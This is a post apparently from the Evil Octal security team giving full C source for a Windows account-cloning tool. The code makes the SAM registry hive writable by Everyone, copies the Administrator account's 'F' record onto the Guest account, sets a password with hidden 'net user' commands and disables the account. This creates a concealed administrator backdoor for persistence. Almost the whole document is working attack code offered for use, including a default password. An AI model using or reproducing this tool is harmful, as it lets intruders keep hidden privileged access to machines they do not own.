C语言0x1f5,C语言简单实现克隆帐户

文章作者:zhouzhen[E.S.T]

信息来源:邪恶八进制信息安全团队

#include

#include

#include

#include

#include

#pragma comment (lib,"Advapi32.lib")

#define MAX_KEY_LENGTH 255

#define MAX_VALUE_NAME 16383

/* Set to 1 by QueryKey() once an account with RID 0x1F5 has been found under
 * SAM\SAM\Domains\Account\Users\Names; main() refuses to continue while it is 0. */
DWORD user_flag = 0;

/* Name of the account QueryKey() selected (the subkey name under ...\Users\Names);
 * main() passes it verbatim to `net user`. Sized in TCHARs, not bytes. */
TCHAR cloneUser[1024];

/* Enumerates the Names key handed in and fills user_flag/cloneUser (defined below). */
void QueryKey(HKEY hKey);

/* Prints the tool's header (defined below). */
void banner();

/* Set the console text attribute used for everything printed afterwards.
 * `color` is passed straight to SetConsoleTextAttribute; callers in this file
 * use 7, 10, 12 and 14 for normal/green/red/yellow text and 0 (black on black)
 * around system(), presumably to hide the child command's output.
 * The API's return value is not checked, as in the original. */
void text_color(WORD color)
{
    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), color);
}

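/* Print one failure line in the tool's house style:
 * "<what> Error: <code>" in grey, a red "[Fail]" marker, then grey again. */
static void report_failure(const TCHAR *what, DWORD code)
{
    text_color(7);
    _tprintf(_T("%s Error: %lu"), what, (unsigned long)code);
    text_color(12);
    _tprintf(_T("[Fail]\n"));
    text_color(7);
}

/* Print "[+]<what>.." followed by a green "[OK]" marker. */
static void report_ok(const TCHAR *what)
{
    text_color(7);
    _tprintf(_T("[+]%s.."), what);
    text_color(10);
    _tprintf(_T("[OK]\n"));
    text_color(7);
}

/* The message the original printed when either `net user` call failed. */
static void report_net_user_failure(void)
{
    text_color(7);
    _tprintf(_T("Set password fail..\n"));
    text_color(12);
    _tprintf(_T("\nFail\n"));
    text_color(7);
}

/* The password is spliced into a command line that goes through the shell
 * (cmd.exe via system()), so whitespace would split the argument and the
 * metacharacters below would terminate or alter the command. Reject those
 * rather than let a stray '&' run something else as Administrator. */
static int password_is_shell_safe(const TCHAR *pw)
{
    return pw != NULL && *pw != _T('\0')
        && _tcspbrk(pw, _T(" \t\"&|<>^%!()")) == NULL;
}

/* Run "net user <user> <tail>" with console output hidden (attribute 0, as the
 * original did around system()). Returns the shell's exit status, or -1 when
 * the command line does not fit the buffer (never silently truncated). */
static int run_net_user(const TCHAR *user, const TCHAR *tail)
{
    TCHAR cmdline[1024];
    int status;
    int n = _sntprintf(cmdline, 1024, _T("net user %s %s"), user, tail);

    if (n < 0 || n >= 1024) {
        return -1;
    }
    cmdline[1023] = _T('\0');

    text_color(0);
    status = _tsystem(cmdline);
    text_color(7);
    return status;
}

/* Account-cloning tool:
 *   1. grants Everyone full control of HKLM\SAM\SAM (inheritable) so the
 *      hive can be read and written;
 *   2. finds the account with RID 0x1F5 (501, the well-known Guest RID)
 *      via QueryKey();
 *   3. copies the binary "F" value of ...\Users\000001F4 (RID 500,
 *      Administrator) onto ...\Users\000001F5;
 *   4. sets that account's password (argv[1], or a built-in default) and
 *      disables it with `net user ... /active:no`;
 *   5. restores the original SAM DACL.
 * Step 5 now runs on EVERY exit path — the original called exit() from several
 * error branches and left HKLM\SAM\SAM world-writable. Only the "F" value is
 * copied; what the cloned account can do afterwards depends on the contents
 * of that record and is not verified here.
 *
 * Usage: clone.exe [password]. Built as an ANSI (non-UNICODE) program: argv is
 * char** and is used as TCHAR*, exactly like the original.
 * Returns 0 on success, 5 when `net user` fails, 1 on any other failure. */
int main(int argc, char **argv)
{
    /* Object-name form GetNamedSecurityInfo expects for SE_REGISTRY_KEY. */
    TCHAR samName[] = _T("MACHINE\\SAM\\SAM");
    PSECURITY_DESCRIPTOR pSD = NULL;
    PACL pOldDacl = NULL;
    PACL pNewDacl = NULL;
    EXPLICIT_ACCESS ea;
    HKEY namesKey = NULL;
    HKEY adminKey = NULL;
    HKEY guestKey = NULL;
    BYTE dataF[2048];                 /* the original allocated 2K for "F" */
    DWORD typeF = REG_BINARY;
    DWORD sizeF = sizeof dataF;
    DWORD dwRet;
    const TCHAR *password;
    int daclModified = 0;
    int rc = 1;

    banner();

    if (argc > 2) {
        text_color(12);
        _tprintf(_T("Usage: clone.exe [password]\n"));
        text_color(7);
        return 1;
    }
    password = (argc == 2) ? argv[1] : _T("zzrjitop");
    if (!password_is_shell_safe(password)) {
        text_color(12);
        _tprintf(_T("Password must be non-empty and contain no spaces or shell metacharacters\n"));
        text_color(7);
        return 1;
    }

    /* Read the current DACL of the SAM key so it can be put back later. */
    dwRet = GetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                                 NULL, NULL, &pOldDacl, NULL, &pSD);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("Set Privilege (1)"), dwRet);
        goto cleanup;
    }

    /* Add an inheritable full-control ACE for Everyone. This is far broader
     * than needed (the caller's own account would do) and is only tolerable
     * because the DACL is restored in cleanup. */
    ZeroMemory(&ea, sizeof ea);
    BuildExplicitAccessWithName(&ea, _T("Everyone"), KEY_ALL_ACCESS, SET_ACCESS,
                                SUB_CONTAINERS_AND_OBJECTS_INHERIT);
    dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("Set Privilege (2)"), dwRet);
        goto cleanup;
    }

    dwRet = SetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                                 NULL, NULL, pNewDacl, NULL);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("Set Privilege (3)"), dwRet);
        goto cleanup;
    }
    daclModified = 1;
    report_ok(_T("Set Privilege"));

    /* Enumeration only needs read access; the DACL above grants far more. */
    dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\\SAM\\Domains\\Account\\Users\\Names"),
                         0, KEY_READ, &namesKey);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("RegOpenKeyEx"), dwRet);
        goto cleanup;
    }

    QueryKey(namesKey);
    if (user_flag == 0) {
        text_color(12);
        _tprintf(_T("The guest user may be delete!\n"));
        text_color(7);
        goto cleanup;                 /* was exit(0): skipped the DACL restore */
    }

    /* Source record: "F" of the RID 0x1F4 (Administrator) account. */
    dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\\SAM\\Domains\\Account\\Users\\000001F4"),
                         0, KEY_QUERY_VALUE, &adminKey);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("RegOpenKeyEx"), dwRet);
        goto cleanup;
    }
    dwRet = RegQueryValueEx(adminKey, _T("F"), NULL, &typeF, dataF, &sizeF);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("RegQueryValueEx"), dwRet);
        goto cleanup;
    }
    if (typeF != REG_BINARY) {
        /* Do not overwrite the Guest record with something unexpected. */
        report_failure(_T("000001F4\\F is not REG_BINARY"), typeF);
        goto cleanup;
    }

    /* Destination: the RID 0x1F5 (Guest) account; only KEY_SET_VALUE is needed. */
    dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\\SAM\\Domains\\Account\\Users\\000001F5"),
                         0, KEY_SET_VALUE, &guestKey);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("RegOpenKeyEx"), dwRet);
        goto cleanup;
    }
    dwRet = RegSetValueEx(guestKey, _T("F"), 0, REG_BINARY, dataF, sizeF);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("RegSetValueEx"), dwRet);
        goto cleanup;
    }
    report_ok(_T("Clone Successfully"));
    report_ok(_T("Try to set user password"));

    /* `net user <name> <password>` then `net user <name> /active:no`.
     * The original ran these through system() with unbounded strcat. */
    if (run_net_user(cloneUser, password) != 0) {
        report_net_user_failure();
        rc = 5;
        goto cleanup;
    }
    if (run_net_user(cloneUser, _T("/active:no")) != 0) {
        report_net_user_failure();
        rc = 5;
        goto cleanup;
    }

    text_color(14);
    _tprintf(_T("[+]User: %s Password: %s\n"), cloneUser, password);
    text_color(7);
    rc = 0;

cleanup:
    if (guestKey) RegCloseKey(guestKey);
    if (adminKey) RegCloseKey(adminKey);
    if (namesKey) RegCloseKey(namesKey);

    /* Put the original DACL back. pOldDacl points into pSD, so this must
     * happen before pSD is freed. A failure here is loud: it means Everyone
     * still has full control of the SAM hive. */
    if (daclModified) {
        dwRet = SetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                                     NULL, NULL, pOldDacl, NULL);
        if (dwRet != ERROR_SUCCESS) {
            text_color(12);
            _tprintf(_T("WARNING: could not restore the SAM DACL (error %lu); ")
                     _T("Everyone still has full control of HKLM\\SAM\\SAM\n"),
                     (unsigned long)dwRet);
            text_color(7);
            if (rc == 0) rc = 1;
        }
    }
    if (pNewDacl) LocalFree(pNewDacl);
    if (pSD) LocalFree(pSD);
    return rc;
}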

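/* Find the account whose RID is 0x1F5 under the Names key passed in.
 *
 * hKey must be an open handle to SAM\SAM\Domains\Account\Users\Names. Each
 * subkey is an account name; the *type* field of that subkey's default value
 * holds the account's RID, which is what the loop compares against 0x1F5
 * (501, the well-known RID of the built-in Guest account). The value data is
 * ignored.
 *
 * On a match the name is copied into cloneUser and user_flag is set to 1.
 * On any failure an error is printed and the function returns with
 * user_flag == 0 — the original called exit() here, which skipped the
 * caller's DACL restore and left the SAM hive world-writable. Subkeys are
 * opened relative to hKey, read-only, and closed on every path (the original
 * leaked both a 2K buffer and the handle per iteration). */
void QueryKey(HKEY hKey)
{
    TCHAR achKey[MAX_KEY_LENGTH];
    BYTE data[2048];                  /* the original allocated 2K per subkey */
    FILETIME lastWrite;
    DWORD cSubKeys = 0;
    DWORD i, retCode;

    ZeroMemory(cloneUser, sizeof cloneUser);
    user_flag = 0;

    retCode = RegQueryInfoKey(hKey, NULL, NULL, NULL, &cSubKeys,
                              NULL, NULL, NULL, NULL, NULL, NULL, NULL);
    if (retCode != ERROR_SUCCESS) {
        text_color(7);
        _tprintf(_T("RegQueryInfoKey Error: %lu"), (unsigned long)retCode);
        text_color(12);
        _tprintf(_T("[Fail]\n"));
        text_color(7);
        return;
    }

    for (i = 0; i < cSubKeys; i++) {
        HKEY tKey = NULL;
        DWORD cbName = MAX_KEY_LENGTH;
        DWORD type = REG_BINARY;
        DWORD size = sizeof data;     /* reset per subkey; the original let it shrink */

        retCode = RegEnumKeyEx(hKey, i, achKey, &cbName, NULL, NULL, NULL, &lastWrite);
        if (retCode != ERROR_SUCCESS) {
            continue;                 /* the original silently skipped these too */
        }

        retCode = RegOpenKeyEx(hKey, achKey, 0, KEY_QUERY_VALUE, &tKey);
        if (retCode != ERROR_SUCCESS) {
            text_color(7);
            _tprintf(_T("RegOpenKeyEx Error: %lu"), (unsigned long)retCode);
            text_color(12);
            _tprintf(_T("[Fail]\n"));
            text_color(7);
            return;
        }

        /* NULL value name = the key's default value; only its type matters. */
        retCode = RegQueryValueEx(tKey, NULL, NULL, &type, data, &size);
        RegCloseKey(tKey);
        if (retCode != ERROR_SUCCESS) {
            text_color(7);
            _tprintf(_T("RegQueryValueEx Error: %lu"), (unsigned long)retCode);
            text_color(12);
            _tprintf(_T("[Fail]\n"));
            text_color(7);
            return;
        }

        if (type == 0x1f5) {
            text_color(7);
            _tprintf(_T("[+]Starting clone %s.."), achKey);
            text_color(10);
            _tprintf(_T("[OK]\n"));
            text_color(7);
            /* achKey is at most MAX_KEY_LENGTH TCHARs, cloneUser holds 1024. */
            _sntprintf(cloneUser, 1024, _T("%s"), achKey);
            cloneUser[1023] = _T('\0');
            user_flag = 1;
            return;
        }
    }
}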

/* Print the tool's header. The four plain lines go out in grey, the credit
 * line in red, and the closing rule in grey again; output text is unchanged. */
void banner(void)
{
    static const TCHAR *const plainLines[] = {
        _T("******************************************************\n"),
        _T("* Clone account Tool http://www.eviloctal.com\n"),
        _T("* Clone the 1F5 user\n"),
        _T("* Usage: clone.exe or clone.exe pass\n"),
        _T("*"),
    };
    size_t k;

    for (k = 0; k < sizeof plainLines / sizeof plainLines[0]; k++) {
        _fputts(plainLines[k], stdout);
    }

    text_color(12);
    _fputts(_T(" If clone successfully it was made by zz[E.S.t]\n"), stdout);
    text_color(7);
    _fputts(_T("******************************************************\n"), stdout);
}
